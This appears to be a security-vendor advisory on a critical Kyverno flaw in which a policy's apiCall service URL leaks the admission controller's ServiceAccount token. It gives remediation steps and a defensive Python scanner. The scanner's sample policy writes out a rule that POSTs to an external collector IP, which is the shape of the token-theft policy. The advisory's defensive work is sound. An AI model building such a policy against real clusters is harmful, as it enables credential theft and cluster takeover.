External risk intelligence

Kyverno could allow internal attacker to gain full cluster control

CVE advisory. Severity: CRITICAL (CVSS 9.1)

CVE-2026-41323

An internal attacker can exploit a flaw in Kyverno to make the admission controller send its own ServiceAccount token to a server the attacker chooses. With that token, which carries permissions to modify admission webhook configurations, the attacker can take full control of the cluster.

Halo Surface Signal: 1

Weakness type: Information Disclosure

Product: Kyverno

Affected versions: before 1.16.4; 1.17.0 to before 1.17.2

External exposure likelihood

Halo Surface Signal score for CVE-2026-41323

Kyverno is a Kubernetes admission controller that operates only on internal cluster networks. It is not an internet-facing service or edge component. Successful exploitation requires an internal attacker who already holds the privilege to create or modify cluster policies, not access from the public internet.

Horizon Alert

Summary of the vulnerability and why it matters

This vulnerability in Kyverno lets an attacker who already has policy-writing access steal the admission controller's ServiceAccount token. That token can then be used to gain full control of the cluster.

  • The stolen token grants full cluster control.
  • Affects clusters that use Kyverno's apiCall feature, or simply allow policies that use it.
  • Requires existing access to exploit.

Attack Path

How an attacker could exploit the issue

An attacker who can create or modify Kyverno `ClusterPolicy` resources can weaponize this by adding a rule whose `apiCall` context points its service URL at an attacker-controlled server. Kyverno attaches the admission controller's ServiceAccount token to that outbound request, so the token is delivered to the attacker. Because that ServiceAccount is permitted to modify webhook configurations, the stolen token lets the attacker change which admission requests are intercepted and how they are mutated, leading to full cluster compromise. The prerequisite is cluster-scoped write access to Kyverno policies, which is a highly privileged role but not necessarily cluster-admin; the flaw escalates it to the admission controller's broader permissions.

  • Internal attacker able to write `ClusterPolicy` resources
  • Malicious `ClusterPolicy` with an external `apiCall` service URL
  • Stolen SA token grants cluster control via webhook configuration changes

Live Threat

Current exploitation, exposure, and threat context

This vulnerability in Kyverno allows an attacker to steal a ServiceAccount token with broad permissions, enabling full cluster compromise. Although the impact is severe, exploitation is limited to attackers who already have a foothold in the Kubernetes cluster with rights to write policies. No public proof-of-concept exploit is known, and no exploitation in the wild has been observed.

  • Exploitation requires internal access.
  • No public exploits are known.
  • Not listed in CISA's Known Exploited Vulnerabilities (KEV) catalog.

Priority actions

Operational Fix

Recommended remediation, mitigation, and detection steps

Upgrade Kyverno to a patched version as the priority action; the flaw lets an authenticated attacker who can write policies take over the whole cluster. If patching must be delayed: audit existing `ClusterPolicy` resources (and namespaced `Policy` resources, which use the same `context` syntax) for `apiCall` contexts whose `service.url` points anywhere other than the cluster API server; alert on audit-log create and update events for Kyverno policy resources; restrict via RBAC who may write them; and watch the admission controller's egress for requests to unexpected hosts. An egress NetworkPolicy on the admission controller pods narrows the exposure, bearing in mind that the controller must still reach the API server and that in-cluster destinations remain reachable.

  • Upgrade Kyverno to a patched version.
  • Audit policies for `apiCall` contexts with external `service.url` values, and alert on new ones.
  • Restrict RBAC write access to Kyverno policy resources and limit the admission controller's egress.
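As a concrete form of the audit step above, the following script is an added example (it is not Kyverno's own tooling and does not come from the advisory). It checks a Kyverno version string against the affected ranges stated on this page and scans `ClusterPolicy` objects, as returned by `kubectl get clusterpolicy -o json`, for `apiCall` contexts whose `service.url` targets a host other than the cluster API server. The allowlist of in-cluster hosts, the sample policy and the IP address in it are constructed for the example and are assumptions, not data from the page.

```python
"""Added example (not Kyverno's own code): check a Kyverno version against the
affected ranges stated on this page, and scan ClusterPolicy objects for apiCall
contexts whose service URL points outside the cluster. Standard library only."""
import json
import sys
from urllib.parse import urlparse


def parse_version(version):
    """'v1.17.2-rc1' -> (1, 17, 2). The pre-release suffix is dropped: the page
    names 1.17.2-rc1 and 1.18.0-rc1 as fixed builds, so an rc of a fixed
    version is treated as fixed here (an assumption for other pre-releases)."""
    core = version.lstrip("v").split("-", 1)[0]
    parts = [int(p) for p in core.split(".")]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])


def is_affected(version):
    """Affected ranges as stated on this page: < 1.16.4 and 1.17.0 <= v < 1.17.2."""
    v = parse_version(version)
    return v < (1, 16, 4) or (1, 17, 0) <= v < (1, 17, 2)


# Hosts that an apiCall 'service.url' may legitimately target. This exact-match
# allowlist is an assumption for the example; adjust it for your own cluster.
ALLOWED_SERVICE_HOSTS = {
    "kubernetes.default",
    "kubernetes.default.svc",
    "kubernetes.default.svc.cluster.local",
}


def find_risky_api_calls(policy):
    """Return (rule, context, url, reason) for every apiCall context whose
    service URL host is not on the allowlist, or is allowed but not https."""
    findings = []
    for rule in policy.get("spec", {}).get("rules", []) or []:
        for ctx in rule.get("context", []) or []:
            api_call = ctx.get("apiCall") or {}
            service = api_call.get("service") or {}
            url = service.get("url")
            if not url:
                # urlPath-only apiCalls are sent to the cluster API server.
                continue
            parsed = urlparse(url)
            host = (parsed.hostname or "").lower()
            if host not in ALLOWED_SERVICE_HOSTS:
                findings.append((rule.get("name"), ctx.get("name"), url, "external host"))
            elif parsed.scheme != "https":
                findings.append((rule.get("name"), ctx.get("name"), url, "cleartext scheme"))
    return findings


def scan(document):
    """Accept a single policy object or a kubectl 'List'; prefix each finding
    with the policy name."""
    items = document["items"] if document.get("kind") == "List" else [document]
    results = []
    for item in items:
        name = item.get("metadata", {}).get("name")
        results.extend((name,) + f for f in find_risky_api_calls(item))
    return results


def scan_json(text):
    return scan(json.loads(text))


# Constructed sample (not a real policy): a harmless urlPath-only apiCall, one
# whose service URL points at a documentation-range IP outside the cluster, and
# one that talks to the API server over plain http.
SAMPLE_POLICY_JSON = """
{
  "apiVersion": "kyverno.io/v1",
  "kind": "ClusterPolicy",
  "metadata": {"name": "example-policy"},
  "spec": {"rules": [
    {"name": "count-namespaces", "context": [
      {"name": "nslist", "apiCall": {"urlPath": "/api/v1/namespaces",
                                     "jmesPath": "items | length(@)"}}]},
    {"name": "lookup-external", "context": [
      {"name": "leak", "apiCall": {"method": "POST",
                                   "service": {"url": "https://203.0.113.10:8443/collect"}}}]},
    {"name": "internal-plain", "context": [
      {"name": "nsinfo", "apiCall": {"service": {"url": "http://kubernetes.default.svc/api/v1/namespaces"}}}]}
  ]}
}
"""

if __name__ == "__main__":
    # Usage: kubectl get clusterpolicy -o json | python3 scan_apicall.py -
    text = sys.stdin.read() if len(sys.argv) > 1 and sys.argv[1] == "-" else SAMPLE_POLICY_JSON
    for policy_name, rule, ctx, url, reason in scan_json(text):
        print(f"{policy_name}: rule={rule} context={ctx} url={url} ({reason})")
    print("Kyverno 1.17.1 affected:", is_affected("1.17.1"))
```

The host allowlist is deliberately an exact match rather than a suffix match on `.svc`: an attacker who can also run pods can front a collector with an in-cluster Service name, so a suffix check would not separate the cases that matter. Treat any hit as a policy to review, not proof of compromise, and pair the scan with audit-log alerting on create and update events for Kyverno policy resources.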

Frequently asked questions

What is Kyverno and how does CVE-2026-41323 affect it?

Kyverno is a policy engine for cloud native platforms. CVE-2026-41323 is a weakness in Kyverno's apiCall feature that allows an attacker to obtain the admission controller's ServiceAccount token, and a stolen token can lead to full cluster compromise. Kyverno versions 1.18.0-rc1, 1.17.2-rc1, and 1.16.4 address this vulnerability.

What is the weakness in Kyverno's apiCall feature that leads to compromise?

The weakness lies in the apiCall feature of Kyverno's ClusterPolicy: the admission controller's ServiceAccount token is automatically attached to the outgoing HTTP request, and the service URL taken from the policy is not validated. The URL can therefore point at an attacker-controlled server, which receives the token. Because the ServiceAccount is permitted to patch webhook configurations, the stolen token grants full cluster compromise capabilities. This is classified as CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor).

How can an attacker exploit CVE-2026-41323 to gain cluster control, and what is the scope of this attack?

An attacker who already holds the privilege to create or modify Kyverno ClusterPolicy resources can create a malicious policy whose apiCall context sends the admission controller's ServiceAccount token to a server the attacker controls. With the stolen token, the attacker can patch webhook configurations and thereby achieve full cluster compromise. The scope is limited to authenticated internal attackers with policy-writing rights; it is not reachable from outside the cluster.

What is the relevance of CVE-2026-41323, and why is it considered an external threat?

CVE-2026-41323 is relevant because it allows an internal attacker with existing access to steal credentials that grant full control of a Kubernetes cluster. Although Kyverno operates within internal cluster networks and is not an internet-facing service, the CVSS v3.1 attack vector is Network (AV:N), so Halo classifies the CVE as external. In practice, exploitation requires an internal attacker with privileges to manipulate cluster policies rather than direct access from the public internet.

What are the recommended steps to mitigate the risk associated with CVE-2026-41323?

The primary operational fix is to upgrade Kyverno to a patched version without delay: 1.16.4 or later on the 1.16 line, 1.17.2 or later on the 1.17 line (the fix first shipped in 1.17.2-rc1), or 1.18.0-rc1 or later. If an immediate upgrade is not feasible, audit existing policies for apiCall contexts whose service URL points outside the cluster, restrict via RBAC who can write Kyverno policy resources, and monitor network traffic from the admission controller for requests to unexpected hosts. The vulnerability requires an authenticated attacker, so broader security best practices, above all least-privilege RBAC, remain crucial.
